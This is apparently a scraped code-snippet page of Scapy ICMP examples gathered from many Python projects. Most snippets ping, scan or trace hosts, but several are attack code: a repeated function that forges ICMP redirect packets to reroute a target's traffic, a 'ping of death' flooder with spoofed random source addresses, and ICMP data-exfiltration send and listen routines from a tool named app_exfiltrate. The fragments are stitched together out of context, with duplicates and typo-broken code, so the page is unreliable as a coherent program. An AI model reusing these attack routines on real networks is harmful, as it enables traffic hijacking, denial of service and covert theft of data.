def detect_inactive_hosts(scan_hosts):
"""
Scans the network to find scan_hosts are live or dead
scan_hosts can be like 10.0.2.2-4 to cover range.
See Scapy docs for specifying targets.
"""
global scheduler
scheduler.enter(RUN_FREQUENCY, 1, detect_inactive_hosts, (scan_hosts, ))
inactive_hosts = []
try:
ans, unans = sr(IP(dst=scan_hosts)/ICMP(), retry=0, timeout=1)
ans.summary(lambda r : r.sprintf("%IP.src% is alive"))
for inactive in unans:
print ("%s is inactive" %inactive.dst)
inactive_hosts.append(inactive.dst)
print ("Total %d hosts are inactive" %(len(inactive_hosts)))
except KeyboardInterrupt:
exit(0)
python类ICMP的实例源码
3_7_detect_inactive_machines.py 文件源码
项目:Python-Network-Programming-Cookbook-Second-Edition
作者: PacktPublishing
项目源码
文件源码
阅读 20
收藏 0
点赞 0
评论 0
def build_icmp(self):
pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\
IP(src=self.target, dst=self.gateway)/UDP()
return pkt
def cmd_ipscan(ip, iface, sleeptime, timeout, verbose):
if verbose:
logging.basicConfig(level=logging.INFO, format='%(message)s')
conf.verb = False
if iface:
conf.iface = iface
ans,unans=sr(IP(dst=ip, proto=(0,255))/"SCAPY",retry=0,timeout=2, verbose=True)
for s,r in ans:
print(r.summary())
if not ICMP in r:
r.show()
def build_icmp(self):
pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\
IP(src=self.target, dst=self.gateway)/UDP()
return pkt
def build_icmp(self):
pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\
IP(src=self.target, dst=self.gateway)/UDP()
return pkt
def build_icmp(self):
pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\
IP(src=self.target, dst=self.gateway)/UDP()
return pkt
def listen():
app_exfiltrate.log_message('info', "[icmp] Listening for ICMP packets..")
# Filter for echo requests only to prevent capturing generated replies
scapy.sniff(filter="icmp and icmp[0]=8", prn=analyze)
def test_icmp(self):
def process_response(echo_reply, dest):
ans, unans = echo_reply
if ans:
log.msg("Received echo reply from %s: %s" % (dest, ans))
else:
log.msg("No reply was received from %s. Possible censorship event." % dest)
log.debug("Unanswered packets: %s" % unans)
self.report[dest] = echo_reply
for label, data in self.destinations.items():
reply = sr1(IP(dst=lebal) / ICMP())
process = process_reponse(reply, label)
#(ans, unans) = ping
#self.destinations[self.dst].update({'ans': ans,
# 'unans': unans,
# 'response_packet': ping})
#return ping
#return reply
def get_last_ping_reply_ts(path):
"""Returns last ICMP echo response timestamp.
If there are no replies in packets - it returns None.
Args:
packets (list): list packets
Returns:
float|None: last ICMP reply timestamp or None
"""
last_replied_ts = None
for packet in read_pcap(path, lfilter=filter_icmp):
if not filter_icmp(packet):
continue
if packet[scapy.ICMP].type == TYPE_ICMP_REPLY:
last_replied_ts = max(last_replied_ts, packet.time)
return last_replied_ts
def build_icmp(self):
pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\
IP(src=self.target, dst=self.gateway)/UDP()
return pkt
03_07_detect_inactive_machines.py 文件源码
项目:011_python_network_programming_cookbook_demo
作者: jerry-0824
项目源码
文件源码
阅读 25
收藏 0
点赞 0
评论 0
def detect_inactive_hosts(scan_hosts):
"""
Scans the network to find scan_hosts are live or dead
scan_hosts can be like 10.0.2.2-4 to cover range.
See Scapy docs for spefifying targets.
"""
global scheduler
scheduler.enter(RUN_FREQUENCY, 1, detect_inactive_hosts, (scan_hosts, ))
inactive_hosts = []
try:
ans, unans = sr(IP(dst = scan_hosts)/ICMP(), retry = 0, timeout = 1)
ans.summary(lambda(s, r) : r.sprintf("%IP.src% is alive"))
for inactive in unans:
print "%s is inactive" %inactive.dst
inactive_hosts.append(inactive.dst)
print "Total %d hosts are inactive" %(len(inactive_hosts))
except KeyboardInterrupt:
exit(0)
def asns_in_traceroute(traceroute, asndb):
"""
Extract ASNs of hops in traceroute and return them as list.
"""
asns = []
for sent, recvd in traceroute:
# Is the response an ICMP TTL Exceeded packet?
if recvd.haslayer(scapy.ICMP) and recvd.payload.type == 11:
asn, _ = asndb.lookup(recvd.src)
if asn is not None:
asns.append(asn)
return asns
def build_icmp(self):
pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\
IP(src=self.target, dst=self.gateway)/UDP()
return pkt
def generator(self, n, filename):
time = 0.00114108 * n + 0.157758
minutes = time/60
print('Generating packets, it will take %s seconds, moreless (%s, minutes)' % (time, minutes))
pkgs = [IP(dst='10.0.0.1')/ICMP() for i in range(n)]
wrpcap(filename, pkgs)
print('%s packets generated.' % (n))
def ping_of_death(self, target):
from scapy.all import IP, ICMP, send
src = "%i.%i.%i.%i" % (
random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
ip_hdr = IP(src, target)
_packet = ip_hdr / ICMP() / (str(os.urandom(65500)))
send(_packet)
def get_gateway(self):
p = sr1(IP(dst="www.google.com", ttl=0) / ICMP() / "X", verbose=0)
return p.src
def heartbeat_call(self, event):
# Send a packet to every WiFiTrilat server.
for host in [s[1:s.find('/WiFi')] for s in self.client.discover()]:
#sr(IP(dst=host)/ICMP(), iface=self.interface)
cli.execute(command='ping -c 4 %s' % host, wait=False, shellexec=True)
def send(data):
data = base64.b64encode(data)
app_exfiltrate.log_message(
'info', "[icmp] Sending {} bytes with ICMP packet".format(len(data)))
scapy.sendp(scapy.Ether() /
scapy.IP(dst=config['target']) / scapy.ICMP() / data, verbose=0)
def analyze(packet):
src = packet.payload.src
dst = packet.payload.dst
try:
app_exfiltrate.log_message(
'info', "[icmp] Received ICMP packet from: {0} to {1}".format(src, dst))
app_exfiltrate.retrieve_data(base64.b64decode(packet.load))
except:
pass
def make_stamp(pkt):
if s.IP in pkt:
ip_send = pkt[s.IP].src
ip_rec = pkt[s.IP].dst
else:
return None
if s.TCP in pkt:
# port_send = pkt[TCP].sport
# port_rec = pkt[TCP].dport
protocol = "TCP"
elif s.UDP in pkt:
# port_send = pkt[UDP].sport
# port_rec = pkt[UDP].dport
protocol = "UDP"
elif s.ICMP in pkt:
# port_send = 1 # pkt[ICMP].sport
# port_rec = 1 # pkt[ICMP].dport
protocol = "ICMP"
else:
return None # if not TCP or UDP or ICMP
return ip_send, ip_rec, protocol
def ping_host(self, ip):
"""method to send ICMP/ARP requests and receive response
from the host with @ip address.
Returns a tuple (ip/host name, ONLINE/OFFLINE, response time)"""
# form an ICMP or ARP packet
packet = self.__gen_packet(ip)
try:
# send and wait for response
answers, unanswers = self.__send_recv(packet)
except PermissionError:
raise PermissionException
if self.__resolve_names:
# resolve host name by ip if resolve_names
# flag was set
try:
host = gethostbyaddr(ip)[HOST_NAME_INDEX]
except herror:
host = ip
else:
# otherwise show ip
host = ip
if answers:
answer = answers[FIRST_INDEX]
# get the request object
req = answer[REQUEST_INDEX]
# get the response object
resp = answer[RESPONSE_INDEX]
# calculate response time and round it
delta = resp.time - req.sent_time
return host, ONLINE, delta
else:
# return unansered results
unanswer = unanswers[FIRST_INDEX]
resp = unanswer[RESPONSE_INDEX]
return host, OFFLINE, None
def test_icmp_ping(self):
def finished(packets):
print packets
answered, unanswered = packets
for snd, rcv in answered:
rcv.show()
packets = IP(dst=self.localOptions['target'])/ICMP()
d = self.sr(packets)
d.addCallback(finished)
return d
def test_icmp_ping(self):
packets = IP(dst=self.localOptions['target'])/ICMP()
answered, unanswered = yield self.sr(packets)
for snd, rcv in answered:
rcv.show()
def ICMPTraceroute(self, host):
if host not in self.hosts:
self.hosts.append(host)
d = defer.Deferred()
reactor.callLater(self.timeout, d.callback, self)
self.sendPackets(IP(dst=host, ttl=(self.ttl_min, self.ttl_max), id=RandShort()) / ICMP(id=RandShort()))
return d
def packetReceived(self, packet):
l = packet.getlayer(1)
if not l:
return
elif isinstance(l, ICMP) or isinstance(l, UDP) or isinstance(l, TCP):
self._recvbuf.append(packet)
def filter_icmp(packet):
"""Returns True if packet contains ICMP layer."""
return scapy.ICMP in packet
def send(data):
data = base64.b64encode(app_exfiltrate.xor(data))
app_exfiltrate.log_message(
'info', "[icmp] Sending {} bytes with ICMP packet".format(len(data)))
scapy.sendp(scapy.Ether() /
scapy.IP(dst=config['target']) / scapy.ICMP() / data, verbose=0)
def listen():
app_exfiltrate.log_message('info', "[icmp] Listening for ICMP packets..")
scapy.sniff(filter="icmp", prn=analyze)
def analyze(packet):
src = packet.payload.src
dst = packet.payload.dst
try:
app_exfiltrate.log_message(
'info', "[icmp] Received ICMP packet from: {0} to {1}".format(src, dst))
app_exfiltrate.retrieve_data(base64.b64decode(packet.load))
except:
pass
def cmd_ping(ip, count, timeout, wait, verbose):
conf.verb = False
layer3 = IP()
layer3.dst = ip
layer3.tos = 0
layer3.id = 1
layer3.flags = 0
layer3.frag = 0
layer3.ttl = 64
layer3.proto = 1 # icmp
layer4 = ICMP()
layer4.type = 8 # echo-request
layer4.code = 0
layer4.id = 0
layer4.seq = 0
pkt = layer3 / layer4
counter = 0
while True:
ans = sr1(pkt, timeout=timeout)
if ans:
if verbose:
ans.show()
else:
print(ans.summary())
del(ans)
else:
print('Timeout')
counter += 1
if count != 0 and counter == count:
break
sleep(wait)
return True